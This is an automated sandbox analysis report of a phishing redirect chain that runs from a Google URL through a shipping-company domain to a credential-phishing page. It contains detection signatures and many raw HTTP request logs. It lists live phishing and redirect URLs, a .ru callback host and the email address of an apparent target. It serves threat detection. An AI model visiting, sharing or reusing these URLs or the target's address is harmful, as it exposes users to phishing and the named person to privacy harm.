Edit tour

Windows Analysis Report
https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==

Overview

General Information

Sample URL:https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnu
Analysis ID:1600457
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 3572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2248,i,13835440009713760261,2985736920505819972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.pn/url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://y3.ackeoneye.com/lo92/Avira URL Cloud: Label: phishing
Source: https://y3.ackeoneye.com/favicon.icoAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 1.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devo... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser developer tools, and redirecting the user to an external website. The script also includes a self-executing function that triggers a redirect after a certain time delay, which is a common technique used in malicious scripts. Overall, this script exhibits a high level of suspicious and potentially malicious behavior, warranting a high-risk score.
Source: 1.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devo... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval(), as well as potential data exfiltration due to the obfuscated nature of the code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
Source: https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devol.esHTTP Parser: No favicon
Source: https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devol.esHTTP Parser: No favicon
Source: https://y3.ackeoneye.com/lo92/#Xgorka.jimenez@devol.esHTTP Parser: No favicon
Source: https://www.amazon.com/HTTP Parser: No favicon
Source: https://www.amazon.com/errors/validateCaptcha?amzn=oOG14CFEo0qNm3ZfyheDnw%3D%3D&amzn-r=%2F&field-keywords=HTTP Parser: No favicon
Source: https://www.amazon.com/errors/validateCaptcha?amzn=V%2FQWGh%2Bxq8nH6gH01OjA4w%3D%3D&amzn-r=%2F&field-keywords=HTTP Parser: No favicon
Source: https://www.amazon.com/errors/validateCaptcha?amzn=tsPwu3l9tzgnem5k5fj8Zw%3D%3D&amzn-r=%2F&field-keywords=HTTP Parser: No favicon
Source: https://www.amazon.com/errors/validateCaptcha?amzn=UOEyeih%2FO2Ng4k18wziu%2Bg%3D%3D&amzn-r=%2F&field-keywords=HTTP Parser: No favicon
Source: https://www.amazon.com/errors/validateCaptcha?amzn=aWtjLQPQePOkOjbZRBDfnw%3D%3D&amzn-r=%2F&field-keywords=HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.pn to https://deshshippinglines.com/demo/mode/ijulkkbhdroceykssx62whnucnhhpavrd66hptu/z29ya2euamltzw5lekbkzxzvbc5lcw==
Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49737 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?sa==a6bzuik1ma3dlpHqxRTACXaYHYI&rct=s7fFjO3jMe8ieQpeNofXnE7ZxaxKrm87scW4CKSzwd4Eiunz5jJ6j2AdElmCOMFCyq&sa=t&url=amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1Host: www.google.pnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/s/deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1Host: www.google.pnConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=eaKUt4_VYblpua5krG8wmy1OZ5I5vsoT1b7F2wjwFPHLm1V0z6pfoZ1JkTGbufe1ZlRTxjRyhYJr4mxJwA4YTouHqmyoKRzyyeMXCgrRvbhtQ62uvjHr919YE0vFiXJuBc_edxPmZ2-22xe0eSUMVMRz1JjvJz0KFwctPLdGJ0ApJ2JYxJMGSAm6hrWvly6WSL9z_N2Y85j6SA
Source: global trafficHTTP traffic detected: GET /demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw== HTTP/1.1Host: deshshippinglines.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: deshshippinglines.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://deshshippinglines.com/demo/mode/IJulKkbhDRoCeYksSX62whnucNHhPavrd66HpTU/Z29ya2EuamltZW5lekBkZXZvbC5lcw==Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lo92/ HTTP/1.1Host: y3.ackeoneye.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://deshshippinglines.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: y3.ackeoneye.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y3.ackeoneye.com/lo92/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkRXeWRhL1VkbnhPS2dxL2YwbGhuZEE9PSIsInZhbHVlIjoiYkwvQmR0anI0QjFsRUJ5RkEza0wyRFYyVFhmV0ovT1Z5TzBnUHNYaHpWTXQ1NWNvcU1KWlBJdnVjckVzZEZDcWhsREg0ekVIamxSUHVjbzBWMnVQTmJIQzVHNlVDVmNDMHBwQXhQWmJGeitYay84UVlKcDZMd2U4d29CSGpOUjgiLCJtYWMiOiJjNmUyZTAyZWY1MzZhNWNhODY0YzM5ZDNkMTk1YzIzOGRlNzgwZTRiZjM3ZGJkM2Y0MGM3ZTg2MGQxMTkyNTIxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhJWkIzV3FlWHlmanhkdndvWVpIbHc9PSIsInZhbHVlIjoicm94dEpFWFFjbERHU3hKQS90Wm5zMjArQWE2WVNFYm5FajBKLytlTU5Md3QyemVIVmJub0lZa0tRTzBHWTQxb1I3Z3YxTFJhMGRmODJiNXR5TU02OWhRNTdXaUFZSXBNUnMwZEZxT093Wis5M2ROS1NyZWFwZjNPTXMzSnY2Y0YiLCJtYWMiOiJiZDg0YzJiNWE3NDIwZTA0N2Q4N2NlOTc0ZGZiMTVmODkyMWQ1ZmM4MTk3NWViZDQ4ZjA1MTE2MmYzYjQ1ZWViIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO HTTP/1.1Host: v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://y3.ackeoneye.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://y3.ackeoneye.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bEmTqrYUaHkPBUqKbdSeNlTEUUwROWNqUMGQBEHFEJZNTPHGLEVGQUDYTUZFTAGOETTRRZRXOXKTBOSDNUUYO HTTP/1.1Host: v27bncxfmlahb4cndraeyexerpo6dunjyclmvgbp4g8o6oqsbi17rop.adlijari.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.css HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/docvmtpr/Captcha_zqhwgudfzb.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /captcha/docvmtpr/Captcha_zqhwgudfzb.jpg HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/csm-captcha-instrumentation.min.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/rd-script-6d68177fa6061598e9509dc4b5bdd08d.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/amazonui/sprites/aui_sprite_0007-1x._V383827579_.png HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/AmazonUI-3c913031596ca78a3768f4e934b1cc02ce238101.secure.min._V1_.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/oc-csi/1/OP/requestId=FX8PKVREDAYJTT4H6MBJ&js=1 HTTP/1.1Host: fls-na.amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/ue-base-1c399ad9886cab69575e1e5ee15c61a1._V313498596_.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/01/csminstrumentation/csm-captcha-instrumentation.min.js HTTP/1.1Host: images-na.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
